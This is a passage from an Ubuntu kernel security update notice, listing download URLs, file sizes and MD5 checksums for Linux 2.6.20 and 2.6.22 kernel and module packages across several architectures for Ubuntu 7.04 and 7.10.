http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-sparc64_2.6.20-17.36_sparc.deb\n      Size/MD5:  2178562 67786fc133bf741d728c88ba444d3537\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-17.36_sparc.deb\n      Size/MD5:   700414 8b12ede19495f6b05c30288cfe31f866\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   264342 9906bcc6b5467bf2c1245eca6054eae5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   156570 4191f2a0d742efeccb67443b3945ff44\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   241232 e8523b32012e66d586f5df1cd381ea73\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:  1110488 174c4c5a9e61867ad11e78dd808f9d42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:  1571838 e2e6a5ffe044c14520e27bcb5f5f47d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   180424 9ba8a77f742b1b835bb1c772ca962e21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   310072 427ac0b7e51cb2ad23fe0ec83962cc5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:    39666 f866b608114c567f28f9289a0d85c393\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:    37984 aa56f559318f20f2e417026970a6bb56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:     8646 b4b5071fe7b4ab2e438d7901370dc94f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:    59422 9d072776affde02fc4c1a90906ed2353\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:    90818 1be13bc72f1ccc91803bba932730c25d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   322570 a483b9ea45cad7ab5c8029e96ea80d4d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   882448 7bb2910febf841cb05000dfd1de8a39f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:     9822 b5066195c7efedec27f28e166ee4967f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   290142 732ddc7d6de7127a9b3163a76531473f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:    54806 a249da34b1433114facbfda16afb0584\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-sparc64-smp_2.6.20.6-17.31_sparc.deb\n      Size/MD5:   998636 e5e1018d1febb0a25443a1608d84d3d8\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-sparc64_2.6.20.6-17.31_sparc.deb\n      Size/MD5:   998568 5dc6e3bd57278f3876e0ac6d1e5ac06a\n\nUpdated packages for Ubuntu 7.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22_2.6.22-15.16.dsc\n      Size/MD5:     2124 215e3f71f504f09cb9d67ba3bce891c9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22_2.6.22-15.16.tar.gz\n      Size/MD5:  3074102 dcede517498030950f00193fd7636cba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-15.54.diff.gz\n      Size/MD5:  3546714 bc3375a85185bb7c896f5373d04f927e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-15.54.dsc\n      Size/MD5:     2262 6d8aecb432a702d53ad5e15f9fce41d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22.orig.tar.gz\n      Size/MD5: 56913972 c98e1329975a8a7931ae63bafe39b63a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22_2.6.22-15.39.dsc\n      Size/MD5:     2224 3fb717a6f4c6ca172730606024026677\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22_2.6.22-15.39.tar.gz\n      Size/MD5:  6963922 51c929273ac6d58421cec603e65fdbc5\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22_2.6.22.4-15.11.diff.gz\n      Size/MD5:   552663 40de07a2a55ec6e25250ef591fa1a70b\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22_2.6.22.4-15.11.dsc\n      Size/MD5:     2735 6b99b949b4bdcac45c5ba49caf55d763\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22_2.6.22.4.orig.tar.gz\n      Size/MD5: 143875748 ccbf90c68bf682e9df2371cd85c83c86\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-doc-2.6.22_2.6.22-15.54_all.deb\n      Size/MD5:  4615002 41f0e4a86eb60e4f347677842fc1a7b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15_2.6.22-15.54_all.deb\n      Size/MD5:  7777268 5cce85c4b4a889d0cbc9a1b5abb3c9a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-kernel-devel_2.6.22-15.54_all.deb\n      Size/MD5:    48284 20aff25c6f59f891366b96484814bf10\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-15.54_all.deb\n      Size/MD5: 45358212 f4fbc3ed3178453493924895e400b616\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-common_2.6.22.4-15.11_all.deb\n      Size/MD5:    23372 1e08b20ca5d505d55d734e1e1aa7c212\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-generic_2.6.22-15.16_amd64.deb\n      Size/MD5:  1181490 06a8c108ea3eb048aa7f7ade85b1ead6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-server_2.6.22-15.16_amd64.deb\n      Size/MD5:     3758 62f7ea6c0cbb542ed06904426dfc097a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-generic-di_2.6.22-15.16_amd64.udeb\n      Size/MD5:      646 5aed5ef44cf626f067fb5225ef8fccf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    24800 531185f6ecc73aa2e5be4b792cc4498e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:   216562 347e3fa6b1550d55c77537eeb557f89d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    49168 107ddc3f1c939471379d549fa2b0febf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    40034 d7b9a5d8878064b9aa69bcaad29267ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    51758 fd8ed4458bef221560be980e99dd9578\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    87876 75cd9e963aa71a3765bb3316f72757b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    35848 1328b905ca910427bdb7473f268bce86\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:   652046 8edc4095a4e1af4691431bb8c46169dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:   205958 069e62303753e4b075d6143d019e1314\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    55596 409a1ea9cd365c2e54f3bd7dcad681c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    60512 d8cc2ae93537ec154afd9655aeba4cfd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:   146252 b33b05e3b2f87bbf0fce5e0a969db483\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:   285930 b020b5eec97f02b2b5a7f8cad963a878\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:  1947322 62487759486e99cac46c84eb141dcf48\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-generic_2.6.22-15.54_amd64.deb\n      Size/MD5:   593756 0cfa2f7530954f717b9bca97595e7ea2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-rt_2.6.22-15.54_amd64.deb\n      Size/MD5:  1165316 0816ef9517f5e049c22437f89add88fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-server_2.6.22-15.54_amd64.deb\n      Size/MD5:   593956 b508af1ec08db9b68fe53097acb42809\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-xen_2.6.22-15.54_amd64.deb\n      Size/MD5:   949302 3c49468b650469542a3fc85c9a85d309\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-generic_2.6.22-15.54_amd64.deb\n      Size/MD5: 17543644 7c467ec6abac34b98b6fc72a5b0a08e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-server_2.6.22-15.54_amd64.deb\n      Size/MD5: 17586456 947e9312ac817b9aaf36a0bae43af3a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-15-generic_2.6.22-15.54_amd64.deb\n      Size/MD5: 18740292 d8f5abc64c06e0d951f00295db516f7d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-15-server_2.6.22-15.54_amd64.deb\n      Size/MD5: 19045588 2c29290b72f5dcf8cde1de91b6c8b061\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-15.54_amd64.deb\n      Size/MD5:   653630 06c7f1cab32983620ce58fab3ed12288\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:   252194 6490c4cf504d462e965ad16f9326a7e6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:   150734 52651e2b2ec7a9348bef67b3c8add406\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:   236406 d03ab1e8dab84b9818448c6579286a25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:  1449288 149bbcbfb2f4801fd74e251c6dd68ebf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:   142738 dbf111770227c3ed685c2a79d028e233\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:   148666 f6b788f8348f92f08c5a81a66e7a02cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    86010 52eca61e95705ecc9e1db45c37ef0d5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    35446 8942a8ccbe1be9e71f07d109875771c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    38396 f506ccb2cb0d35c0f36f676cec4ca394\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    70052 773f942a98207464ca5d62c6f955bc98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    21462 acbac49df228ab72c5ea07d12865bea7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:     8658 da2dac3d46f3ea80526ed9a29c83f56c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    56404 0d818ef611df79adaf83e383bcb93b3d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    88010 0de65f917fd1f6dc28018a910fe29fcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:  1101072 474a9588c6c099d13bdd5404860d3c47\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    45206 069e3168b034cd9756e1726e52f401d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    12676 e66b970e6acd7e648a6dd8fa91711913\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:   462914 b54bda2ce3b03da51c7b0a48b9a2635f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb\n      Size/MD5:    71790 ac4a611b906456588036bcc639c354cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-generic_2.6.22-15.39_amd64.deb\n      Size/MD5:  3013948 86e7a6e87eddd16d2e9ce82e9ec269a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-server_2.6.22-15.39_amd64.deb\n      Size/MD5:  3012046 41d80f29a78860b4f323a669a1fb71b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-generic-di_2.6.22-15.39_amd64.udeb\n      Size/MD5:  1048448 a5be33841544473a7cc80eb6cba14766\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-generic-di_2.6.22-15.39_amd64.udeb\n      Size/MD5:   322530 6ec01c4069caf838edc3830ea5b92c85\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-generic-di_2.6.22-15.39_amd64.udeb\n      Size/MD5:   477916 813f8a19f99dcefbe272b17561d22f50\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/avm-fritz-kernel-source_3.11+2.6.22.4-15.11_amd64.deb\n      Size/MD5:  2134688 59b6823d1adf0dc7ff2dc0155ea21607\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/fglrx-kernel-source_8.37.6+2.6.22.4-15.11_amd64.deb\n      Size/MD5:   191952 3b03fae1017d369824d7955ba655445c\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-rt_2.6.22.4-15.11_amd64.deb\n      Size/MD5: 13660818 b3e3951e1a061dff40d3a05d997c30f1\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-xen_2.6.22.4-15.11_amd64.deb\n      Size/MD5:  9854790 9938d8c957c31d19435a3f8158863f02\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-glx-legacy-dev_1.0.7185+2.6.22.4-15.11_amd64.deb\n      Size/MD5:   169332 c6f2bf946b8030afe43d6cd74228151f\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-glx-legacy_1.0.7185+2.6.22.4-15.11_amd64.deb\n      Size/MD5:  6070814 e857a22069a35ed93d2c5efeef1fa10e\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-kernel-source_1.0.9639+2.6.22.4-15.11_amd64.deb\n      Size/MD5:  1862772 96fbbf557068a82ed152100ef0262672\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-legacy-kernel-source_1.0.7185+2.6.22.4-15.11_amd64.deb\n      Size/MD5:  1390454 60065b0b590d25df1d6f9a0c0bc1377d\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/avm-fritz-firmware-2.6.22-15_3.11+2.6.22.4-15.11_amd64.deb\n      Size/MD5:   479942 325f03b109f752ca8789d0c9e186e68c\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/fglrx-control_8.37.6+2.6.22.4-15.11_amd64.deb\n      Size/MD5:    82088 41d91b8db807afe1807fbd68d7d31556\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-generic_2.6.22.4-15.11_amd64.deb\n      Size/MD5: 13457086 a7c759a22c8004230c597d2337c56a71\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nic-restricted-firmware-2.6.22-15-generic-di_2.6.22.4-15.11_amd64.udeb\n      Size/MD5:      766 ddf18ca1250601123959bdedc2d2c79b\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nic-restricted-modules-2.6.22-15-generic-di_2.6.22.4-15.11_amd64.udeb\n      Size/MD5:      734 753130cf45e4d916ce3792326662ed90\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx-dev_1.0.9639+2.6.22.4-15.11_amd64.deb\n      Size/MD5:   178324 763f49138f65bcd25344b3165caf624d\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx-new-dev_100.14.19+2.6.22.4-15.11_amd64.deb\n      Size/MD5:   158248 da89d68c5bf9bd4a953699b0a7a677c5\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx-new_100.14.19+2.6.22.4-15.11_amd64.deb\n      Size/MD5:  8890896 044fcbd4369090fb6ddfef265c68eda0\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx_1.0.9639+2.6.22.4-15.11_amd64.deb\n      Size/MD5:  7996392 f71195542bcffbd3c5617cd04976dcff\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-new-kernel-source_100.14.19+2.6.22.4-15.11_amd64.deb\n      Size/MD5:  2279348 cbea5190dcb7ebae1c6cae41f812d43c\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/xorg-driver-fglrx-dev_7.1.0-8.37.6+2.6.22.4-15.11_amd64.deb\n      Size/MD5:    67596 6c459900b9d5f076f8db357dd024b33d\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/xorg-driver-fglrx_7.1.0-8.37.6+2.6.22.4-15.11_amd64.deb\n      Size/MD5: 12254418 cfd39f34d91e4a48573ded79c6215427\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-rt_2.6.22-15.16_amd64.deb\n      Size/MD5:     3754 81ca2ccde6e44e42d0acb8b6f4f8d766\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-xen_2.6.22-15.16_amd64.deb\n      Size/MD5:     3782 76929d77a0fbbb99e401a179efe3d40c\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-15-rt_2.6.22-15.54_amd64.deb\n      Size/MD5: 17592292 0cdb657d868402a744dd67acbd9c7b46\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-15-xen_2.6.22-15.54_amd64.deb\n      Size/MD5: 17355358 5cf6d90812d22fe685c4930f6ab5b99a\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-rt_2.6.22-15.39_amd64.deb\n      Size/MD5:  3017126 58a8de462a320964eb37d4713ef063e9\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-xen_2.6.22-15.39_amd64.deb\n      Size/MD5:  3013834 3b2735bb3fe07a149a0c6d7216c3e08d\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-386_2.6.22-15.16_i386.deb\n      Size/MD5:     3756 38e40f57e2213ec44de12fd1586c9a28\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-generic_2.6.22-15.16_i386.deb\n      Size/MD5:  1379014 512338d9fa1b651ecbc39b1db0285688\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-server_2.6.22-15.16_i386.deb\n      Size/MD5:     3768 4c0ab45a0ba5dc56a9006e0797ac8a7f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-386-di_2.6.22-15.16_i386.udeb\n      Size/MD5:      644 5f31cf301f6b8971e7e8733e85c212db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-generic-di_2.6.22-15.16_i386.udeb\n      Size/MD5:      644 df4807c07fdd185f50ef8dc3743bc4bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    20418 0f9de8a6295d16cae1fe7b9d25f4c822\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    23228 5e895d82dd9023b629fef23526464f91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb\n      Size/MD5:   211438 5e635a70e6b1d97021164f5a6bd11d51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb\n      Size/MD5:   213080 df89aaa52d9017a795bf22dec05ec035\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    89010 2e70caf2aa5cefb7070ec8668212188c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    35754 d7642234f8bd7dea30b36dea8816b934\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    50008 21d399d289ffc1c0a787d6d1814ac7fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    50140 127fa8d9247590932c3bec3d2fba5029\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    37956 3d389edb98991e385f671f0d44178d53\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    38610 f07c2e59ed2764026399ebc28685a107\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    44950 3e9f0f01a37259c48855afbfc5043f26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    45204 60ed4bebdd8f793b28687067956b6460\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    85328 a1340f905e08fabee46c8c643fdaa5f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    85656 ca69911c4bdab605ba471592f9b22d24\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb\n      Size/MD5:    32344 0f9de7030cccebbb73316b74ee81d04d\n    